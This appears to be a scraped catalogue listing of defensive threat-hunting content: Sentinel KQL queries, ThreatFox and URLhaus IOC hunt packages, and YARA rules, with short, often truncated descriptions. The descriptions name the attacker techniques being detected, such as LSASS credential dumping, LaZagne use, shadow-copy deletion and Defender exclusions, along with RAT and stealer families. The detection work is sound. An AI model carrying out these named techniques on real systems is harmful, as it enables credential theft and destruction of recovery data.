Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1098.001
AuditLogs

Identifies service principal credential additions by users who received Application Administrator or Global Administrator roles within the preceding 24 hours, consistent with immediate post-compromise

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1003.001
DeviceEvents

This query identifies unauthorized interactive user accounts explicitly requesting highly privileged access masks against the LSASS process. It flags credential dumping attempts by standard users even

credential-thefthuntingmicrosoftofficial
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Evilginx

elf-evilginxiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 33 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 14 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 7 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Unknown Loader

iocthreatfoxunknown_loader
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Unknown RAT

backdooriocthreatfoxunknown_rat
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 5 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
DnsEvents

Hunt package for 5 IOCs associated with Unknown Webinject

iocthreatfoxunknown_webinject
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with ACR Stealer

infostealeriocthreatfoxwin-acr_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 17 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 4 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: PureRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

PureRAT is a remote access trojan that enables attackers to exfiltrate data, execute arbitrary commands, and maintain persistent control over infected systems. It typically arrives via phishing emails with malicious attachments

backdooriocthreatfoxwin-pure_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Sliver

iocthreatfoxwin-sliver
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 54 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with VShell

iocthreatfoxwin-vshell
Yara-Rules source

YARA rule: Unauthorized_Proxy_Server_RAT

backdoorcommunity
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as 176-65-139-99

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as 176-65-148-69

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 46 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The malware associated with "45-

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The malware family "45-92-1-35" is a downloader that exfiltrates data and establishes command-and-control (C2) communication

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 84-54-33-84

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as d52f85

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as opendir

iocurlhaus
Azure-Sentinel source
DeviceProcessEvents

Look for a user being added to the Administrators or Remote Desktop Users group via PowerShell.

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
T1486
DeviceEvents

This rule detects when the ASR rule AsrRansomwareBlocked or AsrRansomwareAudited is triggered. No alert is generated by default. This could be the start of a ransomware attack. Additional information

backdoorhuntingmicrosoftofficialransomware
Backup deletion
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query identifies use of wmic.exe to delete shadow copy snapshots prior to encryption.

huntingmicrosoftofficialwmi
Azure-Sentinel source
DeviceProcessEvents

Instead of running several queries separately, you can also use a comprehensive query that checks for multiple signs of ransomware activity to identify affected devices. The following consolidated que

backdoorhuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

This query checks for attempts to clear at least 10 log entries from event logs using wevtutil.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Search for the creation of a new user using a known DEV-0270 username/password schema.

huntingmicrosoftofficial
DarkSide
kql medium
Azure-Sentinel source
DeviceProcessEvents

Use this query to look for running DarkSide ransomware behavior in the environment

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

This query checks for attempts to delete data on multiple drives using cipher.exe. This activity is typically done by ransomware to prevent recovery of data after encryption.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Search for processes modifying the registry to disable security features.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Use this query to locate commands related to discovering highly privileged users in an environment, sometimes a precursor to ransomware

huntingmicrosoftofficialransomware
Azure-Sentinel source
AlertEvidence

This query checks for alerts related to file drop and remote execution where the file name matches PsExec and similar tools used for distribution

huntinglateral-movementmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Identify masqueraded DLLHost.exe file created by PowerShell.

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Identify dllhost.exe using WMIC to discover additional hosts and associated domain.

huntingmicrosoftofficialwmi
Azure-Sentinel source
DeviceProcessEvents

Identify email exfiltration conducted by PowerShell.

backdoorhuntingmicrosoftofficialpowershell
Fake Replies
kql medium
Azure-Sentinel source
EmailEventsEmailUrlInfo

Use this query to find spoofed reply emails that contain certain keywords in the subject. The emails are also checked for a link to a document in Google Docs. These attacks have been observed leading

huntingmicrosoftofficialransomware
Azure-Sentinel source
AlertEvidence

This query checks alerts related to file backup deletion and enriches with additional alert evidence information

huntingmicrosoftofficial
Azure-Sentinel source
AlertEvidenceDeviceNetworkEvents

This query surfaces alerts related to Gootkit and enriches with command and control information, which has been observed delivering ransomware.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceFileEvents

Use this query to locate persistence in Startup with HTA files.

huntingmicrosoftofficialpersistence
IcedId attachments
kql medium
Azure-Sentinel source
EmailAttachmentInfoEmailEvents

Use this query to locate emails with subject indicators of a reply or forward, and the attachment is a .doc, or a .zip containing a .doc. Review results for suspicious emails. IcedId can lead to ranso

huntingmicrosoftofficialransomware
IcedId Delivery
kql medium
Azure-Sentinel source
DeviceFileEvents

Use this query to locate successful delivery of associated malicious downloads that can lead to ransomware

huntingmicrosoftofficialransomware
Azure-Sentinel source
EmailEventsEmailUrlInfo

Use this query to locate emails and malicious downloads related to the IcedId activity that can lead to ransomware

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Use this query to locate processes executing credential theft activity, often LaZagne in ransomware compromises.

credential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Adversaries are likely leaving ransomware notification messages in the registry to communicate demands, a common tactic to

huntingmicrosoftofficialransomware
Azure-Sentinel source
AlertEvidenceDeviceLogonEvents

Use this query to look for alerts related to suspected ransomware and Cobalt Strike activity, a tool used in numerous ransomware campaigns

cobalt-strikehuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Identify PowerShell creating an exclusion path of ProgramData directory for Microsoft Defender to not monitor.

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Use this query to locate injected processes launching discovery activity. Qakbot has been observed leading to ransomware in numerous instances.

huntingmicrosoftofficialransomware
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

The detection

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1490
DeviceProcessEvents

This rule detects when Shadow Copies are being deleted. This is a known action performed by threat actors (TA). This query detects known commands that have been used by the ransomware actors. Some information

huntingmicrosoftofficialransomware
Sticky Keys
kql medium
Azure-Sentinel source

A technique used in numerous ransomware attacks is a Sticky Keys hijack for privilege escalation/persistence. Surface related alerts with this query.

huntingmicrosoftofficialpersistenceransomware
Azure-Sentinel source
DeviceProcessEvents

This query checks for attempts to stop at least 10 separate processes using the taskkill.exe utility. Run query

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query checks for attempts to stop at least 10 separate processes using the net stop command. Run query

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Looks for potential instances of BitLocker modifying registry settings to allow encryption, where it is executed via a .bat file.

huntingmicrosoftofficial
Azure-Sentinel source
EmailEventsEmailUrlInfo

Use this query to find emails with message IDs that resemble IDs used in known attack emails and contain a link to a document in Google Docs. These behaviors have been observed leading to ransomware atta

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceImageLoadEvents

The hypothesis

huntingmicrosoftofficialransomware
ThreatFox: Antidot IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 4 IOCs associated with Antidot

apk-antidotiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 87 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with FAKEUPDATES

iocjs-fakeupdatesthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 8 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 7 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DeviceFileEventsDnsEventsUrlClickEvents

Hunt package for 10 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 11 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox: Chaos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Chaos

iocthreatfoxwin-chaos
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 50 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Xtreme RAT is a remote access Trojan that enables attackers to execute commands,

backdooriocthreatfoxwin-extreme_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Eye Pyramid

iocthreatfoxwin-eye_pyramid
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with RansomHub

iocransomwarethreatfoxwin-ransomhub
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 11 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with VShell

iocthreatfoxwin-vshell
Azure-Sentinel source
DeviceProcessEvents

This query checks for attempts to turn off at least 10 existing services using sc.exe.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query identifies attempts to stop System Restore and prevent the system from creating restore points, which can be used to recover data encrypted by ransomware

huntingmicrosoftofficialransomware
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 41 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The "base64" malware family is a downloader that uses base64 encoding to obfuscate payloads, often delivering additional malicious

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as bat

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as botnetdomain

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 28 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 10 malicious URLs tagged as exe

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as jar

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 14 malicious URLs tagged as js

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 56 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
CloudAppEvents

The query looks for users or service principals that attached an uncommon credential type to application. As part of the Nobelium campaign, the attacker added credentials to already existing applicati

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

Query for Microsoft Defender Antivirus detections. Query #1: Query for Antivirus detection events.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

The rule detects potential adversary attempts to evade detection by triggering Microsoft Defender Antivirus alerts, which may indicate the presence of malicious software or evasion techniques. SOC teams should proactively hunt for

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEventsDeviceFileEvents

This query shows the source of the AV detections (e.g., the website the file was downloaded from etc.). Get the list of AV detections.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

This query makes a best-guess detection regarding which removable media device caused an AV detection. The query is best run over 30 days to get the full USB history. Get a list of USB AV detections. T

huntingmicrosoftofficial
Control32
yara low
Yara-Rules source

YARA rule: Control32

community
Control64
yara low
Yara-Rules source

YARA rule: Control64

community
cve-2019-0808-c2
kql medium
Azure-Sentinel source
DeviceNetworkEvents

This query was originally published in the threat analytics report, Windows 7 zero-day for CVE-2019-0808. CVE-2019-0808 is a vulnerability that allows an attacker to escape the Windows security sandbox

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, Windows 7 zero-day for CVE-2019-0808. CVE-2019-0808 is a vulnerability that allows an attacker to escape the Windows security sandbox

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Windows 7 zero-day for CVE-2019-0808. CVE-2019-0808 is a vulnerability that allows an attacker to escape the Windows security sandbox

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, Multiple EOP flaws in Dell driver (CVE-2021-21551). CVE-2021-21551 is a vulnerability found in dbutil_2_3.sys, a driver distributed

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub

backdoorevasionexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub

backdoorevasionexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Expanding on DeviceEvents output with Attack Surface Reduction (ASR) rule descriptions. The ActionType values of the ASR events already explain what rule was matched and if it was audited or blocked.

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Get stats on ASR audit events - count events and machines per rule.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Get stats on ASR audit events - count events and machines per rule.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Get stats on ASR audit events - count events and machines per rule.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https

exploithuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidenceDeviceEvents

These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https

exploithuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidenceDeviceEvents

These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Total Controlled Folder Access events.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Total Controlled Folder Access events.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Total Controlled Folder Access events.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Simple query to show the unique network connections that were audited or blocked by ExploitGuard. For more questions on this query, feel free to ping @FlyingBlueMonki on twitter or mattegen@microsoft.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Get stats on ExploitGuard blocks - count events and machines per rule.

exploithuntingmicrosoftofficial
ExploitGuardStats
kql medium
Azure-Sentinel source
DeviceEvents

Get stats on ExploitGuard blocks - count events and machines per rule.

exploithuntingmicrosoftofficial
Yara-Rules source

FiveEyes QUERTY Malware - file 20120.xml

community
Yara-Rules source

FiveEyes QUERTY Malware - file 20120_cmdDef.xml

community
Yara-Rules source

FiveEyes QUERTY Malware - file 20120.dll.bin

community
Yara-Rules source

FiveEyes QUERTY Malware - file 20121_cmdDef.xml

community
GH PM32
yara low
Yara-Rules source

YARA rule: GH_PM32

community
GH PM64
yara low
Yara-Rules source

YARA rule: GH_PM64

community
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, ALPC local privilege elevation. Windows ALPC Elevation of Privilege Vulnerability, CVE-2018-8440, could be exploited to run arbitrar

backdoorexploithuntingmicrosoftofficial
MemStub32
yara low
Yara-Rules source

YARA rule: MemStub32

community
MemStub32 GH1
yara low
Yara-Rules source

YARA rule: MemStub32_GH1

community
MemStub64
yara low
Yara-Rules source

YARA rule: MemStub64

community
MemStub64 GH1
yara low
Yara-Rules source

YARA rule: MemStub64_GH1

community
msvcrt Win7AMD64
yara low
Yara-Rules source

YARA rule: msvcrt_Win7AMD64

community
msvcrt Win7x86
yara low
Yara-Rules source

YARA rule: msvcrt_Win7x86

community
msvcrt WIN8AMD64
yara low
Yara-Rules source

YARA rule: msvcrt_WIN8AMD64

community
msvcrt WIN8x86
yara low
Yara-Rules source

YARA rule: msvcrt_WIN8x86

community
msvcrt WinXPx86
yara low
Yara-Rules source

YARA rule: msvcrt_WinXPx86

community
Yara-Rules source

YARA rule: Network_Win7AMD64

community
Network Win7x86
yara low
Yara-Rules source

YARA rule: Network_Win7x86

community
Network WinXPx86
yara low
Yara-Rules source

The 'Network_WinXPx86' YARA rule detects malicious artifacts or behaviors associated with Windows XP x86 environments, likely targeting legacy systems or remnants of outdated infrastructure. SOC teams should deploy this rule in endpoint

community
Azure-Sentinel source
DeviceEvents

Today MDE Alerts do not show PUA/WDAV ThreatName. This is a demonstration of how to get, for example, PUA Threat Names.

backdoorhuntingmicrosoftofficial
RabbitStew32
yara low
Yara-Rules source

YARA rule: RabbitStew32

community
RabbitStew64
yara low
Yara-Rules source

YARA rule: RabbitStew64

community
Azure-Sentinel source
CloudAppEvents

Looks for users who had a risky sign-in (based on Entra ID Identity Protection risk score) and then performed an ElevateAccess action. ElevateAccess operations can be used by Global Admins to obtain

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

Looks for a new MFA method added to an account that was preceded by a medium or high risk sign-in session for the same user within a maximum 6h timeframe.

huntingmicrosoftofficial
Azure-Sentinel source
IdentityDirectoryEvents

The following query detects possible CVE-2021-42278 exploitation by finding changes of device names in the network using Microsoft Defender for Identity

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_schtask_creation.yml. Questions via Twitter: @janvonkirchheim.

huntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

Adversaries may be leveraging compromised service principals to gain elevated privileges by adding them to privileged

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Query for SmartScreen application blocks on files with "Malicious" reputation, where the user has decided to run the malware nonetheless. Read more about SmartScreen here: https://docs.microsoft.com/wi

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEventsDeviceFileEvents

Query for SmartScreen URL blocks, where the user has decided to run the malware nonetheless. An additional optional filter is applied to query only for cases where Microsoft Edge has downloaded a file

huntingmicrosoftofficial
ThreatFox source
DnsEvents

Hunt package for 82 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEvents

Hunt package for 11 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with Unknown Loader

iocthreatfoxunknown_loader
ThreatFox source
DnsEvents

The "Unknown RAT" malware is a remote access trojan designed to exfiltrate data, execute commands, and establish persistent backdoors on infected systems. It typically arrives via phishing emails containing

backdooriocthreatfoxunknown_rat
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 20 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with ACR Stealer

infostealeriocthreatfoxwin-acr_stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 20 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Brute Ratel C4

backdooriocthreatfoxwin-brute_ratel_c4
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
DnsEvents

MaskGramStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and cryptocurrency wallet information from infected systems. It typically arrives via phishing emails containing malicious links or attachments that deploy the malware through exploit kits or compromised websites. SOC analysts should monitor for unusual outbound connections to the associated domains, anom

infostealeriocthreatfoxwin-maskgramstealer
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 10 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 14 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Sliver

iocthreatfoxwin-sliver
ThreatFox: Tofsee IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Tofsee

iocthreatfoxwin-tofsee
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 67 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with VShell

iocthreatfoxwin-vshell
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 176-65-139-107

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 176-65-139-119

iocurlhaus
